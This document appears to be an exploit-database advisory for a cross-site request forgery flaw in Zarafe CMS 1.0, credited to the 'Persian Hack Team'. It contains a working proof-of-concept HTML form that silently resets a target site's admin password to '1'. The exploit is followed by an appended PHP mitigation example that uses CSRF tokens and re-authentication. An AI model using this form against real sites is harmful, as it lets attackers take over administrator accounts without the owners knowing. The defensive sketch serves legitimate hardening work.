Zarafe CMS 1.0 Cross Site Request Forgery

2016.08.28
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

######################
# Exploit Title : Zarafe CMS 1.0 / CSRF (Rest Admin Password)
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.zarrafeh.net/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 1.0
# Date: 2016/08/27
######################
#
# PoC:

Exploit code(s):
================
Rest Admin Password

The Code for zarafe.html is

<h1 align="Center"> Zarafe CMS CSRF (Rest Admin Password)</h1>
<h1 align="Center"> Persian Hack Team </h1>
<h1 align="Center"> Discover By Mojtaba MobhaM </h1>
<form action="http://target.com/zpanel/includes/operations.php" method="post" name="frm_settings" target="operations">
<table align="center" cellpadding="3px" width="40%" border="1">
<tr>
<td align="left" valign="top" width="140px" nowrap="nowrap"></td><td><input name="username" type="text" style="width:100%;" value="admin" /></td>
</tr>
<tr>
<td align="left" valign="top" nowrap="nowrap"></td><td><input name="password" type="password" style="width:100%;" value="1" /> value=1</td>
</tr>
<tr>
<td align="left" valign="top" nowrap="nowrap"></td><td><input name="password_repeat" type="password" style="width:100%;" value="1"/> value=1</td>
</tr>
<tr>
<td></td><td><input name="btn_submit_settings" type="submit" value="EXP" /></td>
</tr>
</table>
</form>

#Youtube Demo : https://www.youtube.com/watch?v=7JIYTaAiMig

######################
# Discovered by : Mojtaba MobhaM Mail:kazemimojtaba@live.com
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members
# Homepage : persian-team.ir
######################

References:

https://www.youtube.com/watch?v=7JIYTaAiMig
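
Mitigation sketch (an added example, not part of the original advisory and not Zarafe CMS code): the PoC form submits only username, password and password_repeat, with no anti-CSRF token and no current password, so a handler that requires both rejects it. The function names, the csrf_token session key and the current_password field are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened handler for a password-change POST.
// Not Zarafe CMS code; function names, session key and field names are assumptions.
declare(strict_types=1);

// Issue one random token per session; the settings form embeds it in a hidden field.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// Returns [HTTP status, message or new hash]; the password changes only on 200.
function change_password(array &$session, array $post, string $currentHash): array
{
    if (!csrf_valid($session, $post)) {
        return [403, 'missing or invalid CSRF token'];
    }
    // Re-authentication: a forged request cannot supply the current password.
    if (!password_verify((string)($post['current_password'] ?? ''), $currentHash)) {
        return [403, 'current password incorrect'];
    }
    $new = $post['password'] ?? '';
    if (!is_string($new) || $new === '' || $new !== ($post['password_repeat'] ?? null)) {
        return [400, 'passwords empty or do not match'];
    }
    unset($session['csrf_token']); // single-use token
    return [200, password_hash($new, PASSWORD_DEFAULT)];
}

// Constructed demo: the forged POST carries only the fields from the PoC form.
$session = [];
$hash = password_hash('old-secret', PASSWORD_DEFAULT);
$token = csrf_token($session);
$forged = ['username' => 'admin', 'password' => '1', 'password_repeat' => '1'];
$legit = $forged + ['csrf_token' => $token, 'current_password' => 'old-secret'];
echo change_password($session, $forged, $hash)[0], "\n"; // forged request status
echo change_password($session, $legit, $hash)[0], "\n";  // legitimate request status
```

In a real handler $session would be $_SESSION and $post would be $_POST; setting the SameSite attribute on the session cookie is a complementary control, not a replacement for the token.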

